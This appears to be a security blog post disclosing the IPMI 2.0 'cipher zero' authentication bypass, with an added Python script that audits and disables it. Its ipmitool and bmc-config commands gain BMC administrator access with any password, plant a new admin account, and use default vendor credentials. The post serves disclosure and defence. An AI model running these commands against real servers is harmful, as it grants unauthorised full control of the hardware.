The Brain-Death in the IPMI Specification

The Infamous Cipher 0

It's hard to imagine someone thinking this up. The IPMI 2.0 Specification introduced cryptography into IPMI. Perhaps someone thought... well, cryptography is hard. So let's put in a way to completely sidestep not only cryptography, but authentication as well. This is the essence of cipher zero - it's really no cipher at all, or the un-cipher. It does require that IPMI is turned on and that a valid account name exists on the BMC; you simply don't need that account's password. Vendors always have a default account, however, so that makes things a bit easier.

So let's see, to belabor the obvious: to execute an IPMI command you normally supply proper authentication, here with good ol' bmc-config:

$ bmc-config -D LAN_2_0 -I 0 -v -u root -p calvin -h 10.0.0.1 --checkout|grep -i cipher_suite_id_0
Maximum_Privilege_Cipher_Suite_Id_0 Administrator

You know, that line of output is not good: it says cipher suite 0 is enabled and grants Administrator privilege. How not good is "not good"? Well, let's try it again... this time with "FluffyWabbit" as the password:

$ bmc-config -D LAN_2_0 -I 0 -v -u root -p FluffyWabbit -h 10.0.0.1 --checkout|grep -i cipher_suite_id_0
Maximum_Privilege_Cipher_Suite_Id_0 Administrator

I guess this is neat. Or sad. Or something. You can try other passwords to verify FluffyWabbit isn't some vendor hardcoded backdoor ;)

That said, so what? What's the worst that can happen? Ok... well, let's try this on my Dell iDRAC. It has an account called root, and a password that we don't know.

# this shouldn't work
$ ipmitool -H 10.0.0.1 -U root -P calvin chassis status
Activate Session command failed
Error: Unable to establish LAN session
Error sending Get Self Test command
# this really shouldn't either, but does.
$ ipmitool -I lanplus -C 0 -H 10.0.0.1 -U root -P FluffyWabbit chassis status

Note that you have to explicitly ask for IPMI 2.0 (the lanplus interface, in this case) as well as for cipher zero ("-C 0"); the plain LAN interface in the first attempt uses the 1.5 protocol, where cipher zero doesn't exist.

Still unimpressed, I know. Well, onwards. Let's create an IPMI account, give it a password and administrator rights, and enable it. I'll use both ipmitool and bmc-config; the former is great for illustrating settings, while the latter's output is very simple to understand.

# one account is there now
$ ipmitool -I lanplus -C 0 -H 10.0.0.1 -U admin -P FluffyWabbit user list
ID  Name   Callin  Link Auth  IPMI Msg  Channel Priv Limit
2   admin  true    true       true      ADMINISTRATOR
$ cat bozo.txt
# add a user with administrative rights
Section User9
    Username                            bozo
    Password                            theclown
    Enable_User                         Yes
    Lan_Enable_IPMI_Msgs                Yes
    Lan_Enable_Link_Auth                Yes
    Lan_Enable_Restricted_to_Callback   No
    Lan_Privilege_Limit                 Administrator
    SOL_Payload_Access                  Yes
    Serial_Enable_IPMI_Msgs             Yes
    Serial_Enable_Link_Auth             Yes
    Serial_Enable_Restricted_to_Callback No
    Serial_Privilege_Limit              Administrator
EndSection
# et tu, bmc-config?
$ bmc-config -v -u root -p calvin -h 10.0.0.1 --commit -f bozo.txt
# voila
$ ipmitool -I lanplus -C 0 -H 10.0.0.1 -U admin -P FluffyWabbit user list
ID  Name   Callin  Link Auth  IPMI Msg  Channel Priv Limit
2   admin  true    true       true      ADMINISTRATOR
9   bozo   true    true       true      ADMINISTRATOR
# take the new account out for a test drive; no cheating with C0 this time
$ ipmitool -H 10.0.0.1 -U bozo -P theclown user list
ID  Name   Callin  Link Auth  IPMI Msg  Channel Priv Limit
2   admin  true    true       true      ADMINISTRATOR
9   bozo   true    true       true      ADMINISTRATOR

Since IPMI administrative access grants you god powers on the server, it's a bit problematic that it's so easy to get admin rights.

I believe that IBM, as of the M2/Nehalem generation, has essentially abolished cipher zero through the efforts of Jarred B Johnson (kudos to both!). Dell told me that it was no longer on by default in the most recent version of iDRAC. I'm not sure who else still has this going on - but you might check your own boxes. Drop me a line if you hear your vendor has this on or off by default.
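Checking your own boxes is easier if the checkout output is parsed rather than eyeballed. As an added example (not from the original post, and not freeipmi's own code), here is a small Python audit helper that reads bmc-config --checkout output, reports whether cipher suite 0 still carries a privilege, and produces the fragment you would feed back with --commit -f to set it to Unused. It assumes the key layout shown earlier (Maximum_Privilege_Cipher_Suite_Id_N followed by a privilege word); the section name Rmcpplus_Conf_Privilege and the value Unused are what freeipmi uses for these keys as far as I know, so verify them against your own --checkout output, and the checkout excerpt embedded in the code is constructed, not captured from a real BMC.

```python
"""Audit bmc-config --checkout output for cipher suite 0 and emit a fix.

Added example, not from the original post and not part of freeipmi.
Assumptions: keys look like 'Maximum_Privilege_Cipher_Suite_Id_N <priv>',
they live in a section named Rmcpplus_Conf_Privilege, and 'Unused'
is the value that disables a suite (check your own checkout output).
"""
import re

# Constructed sample of a bmc-config --checkout excerpt (not from a real BMC).
SAMPLE_CHECKOUT = """\
Section Rmcpplus_Conf_Privilege
\t## Possible values: Unused/User/Operator/Administrator/OEM_Proprietary
\tMaximum_Privilege_Cipher_Suite_Id_0       Administrator
\tMaximum_Privilege_Cipher_Suite_Id_1       Administrator
\tMaximum_Privilege_Cipher_Suite_Id_2       Unused
\tMaximum_Privilege_Cipher_Suite_Id_3       Administrator
EndSection
"""

# One key/value line; comment lines starting with '##' never match.
KEY_RE = re.compile(r"^\s*Maximum_Privilege_Cipher_Suite_Id_(\d+)\s+(\S+)\s*$")


def parse_cipher_privileges(checkout_text):
    """Return {suite_id: privilege_word} for every cipher suite key found."""
    privs = {}
    for line in checkout_text.splitlines():
        m = KEY_RE.match(line)
        if m:
            privs[int(m.group(1))] = m.group(2)
    return privs


def cipher_zero_finding(privs):
    """Describe the cipher 0 state, or None if it is already Unused or not listed."""
    priv = privs.get(0)
    if priv is None or priv == "Unused":
        return None
    return f"cipher suite 0 is enabled with maximum privilege {priv}"


def remediation_fragment(privs, section="Rmcpplus_Conf_Privilege"):
    """Build a bmc-config --commit file setting suite 0 to Unused.

    Every other suite keeps the privilege read from the checkout, so
    committing this changes exactly one setting.
    """
    lines = [f"Section {section}"]
    for suite_id in sorted(privs):
        value = "Unused" if suite_id == 0 else privs[suite_id]
        lines.append(f"\tMaximum_Privilege_Cipher_Suite_Id_{suite_id} {value}")
    lines.append("EndSection")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # Offline usage on the constructed sample; in practice feed it the
    # text of `bmc-config ... --checkout` for the host being audited.
    found = parse_cipher_privileges(SAMPLE_CHECKOUT)
    finding = cipher_zero_finding(found)
    print(finding or "cipher suite 0 is Unused")
    if finding:
        print(remediation_fragment(found))
```

Write the printed fragment to a file and commit it with bmc-config the same way bozo.txt was committed above, then re-run the checkout and the -C 0 test to confirm the BMC actually honours the change; as the disclaimer below notes, tool and firmware bugs mean the checkout alone isn't proof.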

Disclaimer

Various versions of the IPMI utilities - including bmc-config - do not work correctly with cipher 0 and will fail; this misled me early on in testing my own boxes. The latest version of freeipmi seems to work on all the ones I've tested, at least; make sure you have downloaded the latest copy and try this to verify good ol' cipher 0 is still around. Most commands say they support cipher zero, but ensure you have the latest version, because bugs abound out there in the tools and/or in the BMCs. Here are a couple more ways to see if this is enabled:

$ ipmitool -I lanplus -C 0 -H 10.0.0.1 -U admin -P FluffyWabbit lan print
$ ipmiutil lan -J 0 -N 10.0.0.1 -U admin -P FluffyBunny

Ipmiutil has a nice printing of the results - if anything in the RMCP+ line below looks zero-ish, that's bad :) Cipher Privs refers to the maximum privilege the account can have using a given cipher suite.

$ ipmitool -I lanplus -C 0 -H 10.0.0.1 -U root -P calvin lan print
Set in Progress         : Set Complete
Auth Type Support       : NONE MD2 MD5 PASSWORD
Auth Type Enable        : Callback : MD2 MD5
                        : User     : MD2 MD5
                        : Operator : MD2 MD5
                        : Admin    : MD2 MD5
                        : OEM      :
IP Address Source       : Static Address
IP Address              : 10.0.0.1
Subnet Mask             : 255.255.255.0
MAC Address             : 14:fe:b5:c7:df:28
SNMP Community String   : public
IP Header               : TTL=0x40 Flags=0x40 Precedence=0x00 TOS=0x10
Default Gateway IP      : 192.168.0.1
Default Gateway MAC     : 00:00:00:00:00:00
Backup Gateway IP       : 0.0.0.0
Backup Gateway MAC      : 00:00:00:00:00:00
802.1q VLAN ID          : Disabled
802.1q VLAN Priority    : 0
RMCP+ Cipher Suites     : 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14
Cipher Suite Priv Max   : aaaaaaaaaaaaaaaa
                        :     X=Cipher Suite Unused
                        :     c=CALLBACK
                        :     u=USER
                        :     o=OPERATOR
                        :     a=ADMIN
                        :     O=OEM